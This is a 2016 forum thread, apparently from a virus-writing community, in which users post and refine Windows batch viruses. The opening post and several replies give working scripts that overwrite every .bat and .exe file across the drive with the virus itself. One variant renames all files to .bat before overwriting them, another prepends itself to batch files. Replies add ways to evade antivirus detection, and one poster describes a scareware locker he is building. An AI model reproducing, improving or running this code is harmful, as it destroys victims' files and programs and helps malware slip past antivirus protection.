1 (edited by zask 2016-12-04 08:17:26)

Topic: Batch virus, infect multiple folders with little effort

Havent seen many batch viruses here that spread in multiple folders, usually most of them on this website only infect its current directory. So for people with little knowlege of batch i made this, it will spread through all batch files on the pc, and hopefully destroy all the exe files too. It recursivly searches up each folder for the files to infect, each time the loop jumps up a directory, it recursivly search down each folder for the files to infect as well, running it may or may not destroy everything, but it will cause a alot of programs in alot of folders, and will give batch files a better oppertunity in gaining more ground to spread off of, down side is av may detect it one day because of its annoyance but its nothing that obfuscation cant fix.


@echo off
for %%A in ("%CD%") do set topfolder=%%~DA\
:start
cd..
for %%A in (*.bat *.exe) do copy /y %0 "%%~DPNXA"
for /r %%X in (*.bat *.exe) do copy /y %0 "%%X"
if "%CD%"=="%TOPFOLDER%" goto end
goto start
:end

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

At least it isn't Anonymousguy-level shitty...
Thanks!

I like to examine and theorize about everything, from Amazon's <quote> impenetrable </quote> ultravisor to autorun viruses (virii?) being technology's version of an STD (Slot Transmitted Disease).
I dabble in Python 2.x and non-stereotypical BATCH (x>50 lines). I also fuck up VMs from time to time.

┬──┬ ︵ /(.□. \)

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

Yeniaul wrote:

At least it isn't Anonymousguy-level shitty...
Thanks!

No problem. Hate shit code, to much garbage on the internet these days, glad you liked it.

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

zask wrote:
Yeniaul wrote:

At least it isn't Anonymousguy-level shitty...
Thanks!

No problem. Hate shit code, to much garbage on the internet these days, glad you liked it.


"and hopefully destroy all the exe files too"  roll  really?

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up Thumbs down

5 (edited by zask 2016-12-04 23:39:43)

Re: Batch virus, infect multiple folders with little effort

slek wrote:
zask wrote:
Yeniaul wrote:

At least it isn't Anonymousguy-level shitty...
Thanks!

No problem. Hate shit code, to much garbage on the internet these days, glad you liked it.


"and hopefully destroy all the exe files too"  roll  really?

Well, by destroy was referring to it rendering the exe files unusable, tested in windows ten, when it overwrites the exe files it causes them to proceed with an error rather than work correctly. If wrapped inside an exe file with advance bat to exe converter, it will replace the exe files with a copy of itself rather than rendering them unusable. You may already know this, but im not you so i cant suspect that you do. I have not concluded that it will overwrite "all" files as i do not know how far the recursive command can spread through folders, but i do know it will spread much much further than a normal batch virus that only overwrite files in its current dirrectory.

Thumbs up +1 Thumbs down

6 (edited by slek 2016-12-04 23:53:49)

Re: Batch virus, infect multiple folders with little effort

*edit edit delete edit* i feel horrible now..   neutral

keep doing what your doing we all started with little batch scripts. look at SPTH, he used to write batch viruses  tongue

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up +1 Thumbs down

7 (edited by Yeniaul 2016-12-05 02:17:21)

Re: Batch virus, infect multiple folders with little effort

slek wrote:

*edit edit delete edit* i feel horrible now..   neutral

keep doing what your doing we all started with little batch scripts. look at SPTH, he used to write batch viruses  tongue

No, Anonymousguy, this is NOT an enabler... for you.

I like to examine and theorize about everything, from Amazon's <quote> impenetrable </quote> ultravisor to autorun viruses (virii?) being technology's version of an STD (Slot Transmitted Disease).
I dabble in Python 2.x and non-stereotypical BATCH (x>50 lines). I also fuck up VMs from time to time.

┬──┬ ︵ /(.□. \)

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

slek wrote:

*edit edit delete edit* i feel horrible now..   neutral

keep doing what your doing we all started with little batch scripts. look at SPTH, he used to write batch viruses  tongue

ownn slek is so sweet smile

"There is no spoon." - http://guitmz.com/

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

guitmz wrote:
slek wrote:

*edit edit delete edit* i feel horrible now..   neutral

keep doing what your doing we all started with little batch scripts. look at SPTH, he used to write batch viruses  tongue

ownn slek is so sweet smile


i just hope he didn't read my unedited post yikes

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

slek wrote:
guitmz wrote:
slek wrote:

*edit edit delete edit* i feel horrible now..   neutral

keep doing what your doing we all started with little batch scripts. look at SPTH, he used to write batch viruses  tongue

ownn slek is so sweet smile


i just hope he didn't read my unedited post yikes

smile

"There is no spoon." - http://guitmz.com/

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

guitmz wrote:
slek wrote:
guitmz wrote:

ownn slek is so sweet smile


i just hope he didn't read my unedited post yikes

smile

What was it?

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

Self replication is cool too i guess

@echo off
set "X=0"
set "rand=1%RANDOM:~-1%%RANDOM:~-1%"
:loop_start1
set /a "X+=1"
if %X%==%RAND% goto loop_end2
type %0 > %RANDOM%%RANDOM%%RANDOM%%RANDOM%.bat & type %0 > con
goto loop_start1
:loop_end2
for %%A in ("%CD%") do set topfolder=%%~DA\
:loop_start2
cd..
for %%A in (*.bat *.exe) do copy /y %0 "%%~DPNXA"
for /r %%X in (*.bat *.exe) do copy /y %0 "%%X"
if "%CD%"=="%TOPFOLDER%" goto loop_end2
goto loop_start2
:loop_end2
exit

Thumbs up Thumbs down

13 (edited by slek 2016-12-08 00:56:56)

Re: Batch virus, infect multiple folders with little effort

try to have it prepend or append to the infected file without re-infecting the same file over and over,,

and instead of using all those loopes, try to do it inside one loop..
for %%a whatever do (
set blah=%%a
whatever %bla%
)

as far as i can remember

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

My own smaller, more compact overriding version using forfiles instead of for:
@echo off
for /r %%z in (*.*) do attrib>nul -r -a -s -h -i "%%z"
for /r %%y in (*.*) do ren>nul "%%y" "*.bat"
forfiles /m *.bat /s /c "cmd /c copy>nul /y %~f0 @path"

My prepending version:
@echo off
for %%z in (*.bat) do attrib>nul -r -a -s -h -i "%%z"
for %%y in (*.bat) do (
copy>nul /y /b %0 + %%y %%y.bat
move>nul "%%y.bat" "%%y"
)
copy>nul /y "%~f0" "%RANDOM%.bat"
call>nul %0

Disclaimer: I'm not responsible for anything you do with this code. It is for educational purposes only.

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

RCV5 wrote:

My own smaller, more compact overriding version using forfiles instead of for:
@echo off
for /r %%z in (*.*) do attrib>nul -r -a -s -h -i "%%z"
for /r %%y in (*.*) do ren>nul "%%y" "*.bat"
forfiles /m *.bat /s /c "cmd /c copy>nul /y %~f0 @path"

My prepending version:
@echo off
for %%z in (*.bat) do attrib>nul -r -a -s -h -i "%%z"
for %%y in (*.bat) do (
copy>nul /y /b %0 + %%y %%y.bat
move>nul "%%y.bat" "%%y"
)
copy>nul /y "%~f0" "%RANDOM%.bat"
call>nul %0

Disclaimer: I'm not responsible for anything you do with this code. It is for educational purposes only.

1: the prepender re-infects the same files
2: it prepends itself along with the host code in to the victim file
3: forfile doesn't make it special in any way.

I hate what this place has become.

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up Thumbs down

16 (edited by RCV5 2016-12-09 17:55:01)

Re: Batch virus, infect multiple folders with little effort

The forfiles simply makes it harder for antivirus heuristics to pick it up and for the record does it really matter if it infects the same files over and over? That makes the virus take up more disk space each time it replicates which is part of the payload. So please ride that high horse of, "I know Perl or C therefore I should be overly critical of all the people who are beginners" but please just keep in mind that everyone has to start somewhere and if you don't like the site, just don't go on it!

Thumbs up Thumbs down

17 (edited by slek 2016-12-09 20:00:20)

Re: Batch virus, infect multiple folders with little effort

RCV5 wrote:

The forfiles simply makes it harder for antivirus heuristics to pick it up and for the record does it really matter if it infects the same files over and over? That makes the virus take up more disk space each time it replicates which is part of the payload. So please ride that high horse of, "I know Perl or C therefore I should be overly critical of all the people who are beginners" but please just keep in mind that everyone has to start somewhere and if you don't like the site, just don't go on it!


I do have a high horse that I like to ride, pretty often and she's beautiful and no I wont get off my horse!
the forfiles does no such thing, you could do:
set x123=for
set x321=type
%x123% %%x in (*.bat) do %x321% > %%x

tadaaa there is your "fud" almighty batch virus! i take no responsibility and blablabla...

yes it does matter because your functional virus (if you can call it a virus) quickly becomes a unfunctional virus which defeats the whole purpose of a virus in the first place.  roll

I do know perl, I don't know C but I wouldn't waste my time learning it to embarrass my self here by uploading hf standards code showing people how to write to the auto run key in the registry.

Don't try to justify your lazyness by calling it a payload  roll  if you are going to do it then do it properly.

p.s: i was here many years before people like you knew it existed and come along to destroy it.

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up +1 Thumbs down

18 (edited by RCV5 2016-12-09 20:52:55)

Re: Batch virus, infect multiple folders with little effort

I was trying to show that there are much more creative ways besides just obfuscation to keep things from being detected and I tested it on virustotal so I am sure that it isn't detected. Allow me to demonstrate a rather simple concept, if you take a line like:
for %%a in (*.bat) do copy %0 %%a (which is detected by most decent AV scanners)
Then replace it with:
forfiles /m *.bat /c "cmd /c copy %~f0 @path"

You can accomplish the same thing the first script can do with the second script except AV scanners won't detect it. It is matter of using a different command to execute the same function. Think of it with an analogy, you could go through a car wash to wash your car or you could wash it with a sponge and garden hose but regardless, the car gets washed.
I'll take your criticism into consideration and next time I will put in more effort to make my scripts less sloppy and more functional. Cheers! smile

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

RCV5 wrote:

I was trying to show that there are much more creative ways besides just obfuscation to keep things from being detected and I tested it on virustotal so I am sure that it isn't detected. Allow me to demonstrate a rather simple concept, if you take a line like:
for %%a in (*.bat) do copy %0 %%a (which is detected by most decent AV scanners)
Then replace it with:
forfiles /m *.bat /c "cmd /c copy %~f0 @path"

You can accomplish the same thing the first script can do with the second script except AV scanners won't detect it. It is matter of using a different command to execute the same function. Think of it with an analogy, you could go through a car wash to wash your car or you could wash it with a sponge and garden hose but regardless, the car gets washed.
I'll take your criticism into consideration and next time I will put in more effort to make my scripts less sloppy and more functional. Cheers! smile

Well, you got a point , but i never knew that "forfiles" can be used to evade AV heuristic scan

Thumbs up Thumbs down

20 (edited by zask 2016-12-13 06:24:32)

Re: Batch virus, infect multiple folders with little effort

UnkownUser wrote:
RCV5 wrote:

I was trying to show that there are much more creative ways besides just obfuscation to keep things from being detected and I tested it on virustotal so I am sure that it isn't detected. Allow me to demonstrate a rather simple concept, if you take a line like:
for %%a in (*.bat) do copy %0 %%a (which is detected by most decent AV scanners)
Then replace it with:
forfiles /m *.bat /c "cmd /c copy %~f0 @path"

You can accomplish the same thing the first script can do with the second script except AV scanners won't detect it. It is matter of using a different command to execute the same function. Think of it with an analogy, you could go through a car wash to wash your car or you could wash it with a sponge and garden hose but regardless, the car gets washed.
I'll take your criticism into consideration and next time I will put in more effort to make my scripts less sloppy and more functional. Cheers! smile

Well, you got a point , but i never knew that "forfiles" can be used to evade AV heuristic scan


Trust me i know, ive created many things in much more than just obfucation. Have you seen them?  Also thats a cool trick btw, one of the reasons i started liking scripts is because how easy it can be at times to manipulate the way things work. would yall like to see what ive been working on lately? Its not finished yet but it almost is. Its kinda like a ransomware used to scare the user into paying money. Looks pretty cool and ligit too. Locks them out their desktop and demands for an password thats encrypted, disables taskmanager, and runs registry start if ran with admin rights. If not ran as an admin it will run from startup and attempt to scare a non educated being to pay for it. After im done i would like to advise any ideas to what ive made. I enjoy all the smart people here, i like learning and sharing code and scripts as long as they works and and have clear understanding, or at least clear explanation to things that appear more hard to understand. A lot of people at my school dont get why i like doing this, honestly i dont either. But hopefully i wont die out of this hobby like many of my others.

Thumbs up Thumbs down

21 (edited by zask 2016-12-13 06:43:00)

Re: Batch virus, infect multiple folders with little effort

slek wrote:

try to have it prepend or append to the infected file without re-infecting the same file over and over,,

and instead of using all those loopes, try to do it inside one loop..
for %%a whatever do (
set blah=%%a
whatever %bla%
)

as far as i can remember

Okay good idea.  But how do i infect all batch files in all folders, dont reinfect already existing files in infected folders, while at the same time exclude infecting any files in important folders like the temp folder or startup, that way you can have the advantage of not damaging any important files that you want your virus to call or run?

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

zask wrote:
slek wrote:

try to have it prepend or append to the infected file without re-infecting the same file over and over,,

and instead of using all those loopes, try to do it inside one loop..
for %%a whatever do (
set blah=%%a
whatever %bla%
)

as far as i can remember

Okay good idea.  But how do i infect all batch files in all folders, dont reinfect already existing files in infected folders, while at the same time exclude infecting any files in important folders like the temp folder or startup, that way you can have the advantage of not damaging any important files that you want your virus to call or run?

by researching just like we had to back then.. and creativity and common sense.

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

theres a lot of good stuff here at the vx library, its a great starting point

"There is no spoon." - http://guitmz.com/

Thumbs up Thumbs down

Re: Batch virus, infect multiple folders with little effort

come to think of it this is where I began learning perl many years ago from snakebytes tutorials and eventually built up the courage to make my first perly virus which I'm now embarresed by: http://vxheaven.org/doomriderz/projects/StarPerl.txt

eval(join$",qw/perl " ( print another Just ; girl )/[qw/3 2 1 5 4 0 7 1 8 6/]);

Thumbs up +1 Thumbs down

Re: Batch virus, infect multiple folders with little effort

slek wrote:

come to think of it this is where I began learning perl many years ago from snakebytes tutorials and eventually built up the courage to make my first perly virus which I'm now embarresed by: http://vxheaven.org/doomriderz/projects/StarPerl.txt

I used to code a little perl myself, but never got to writing viruses in it

Thumbs up Thumbs down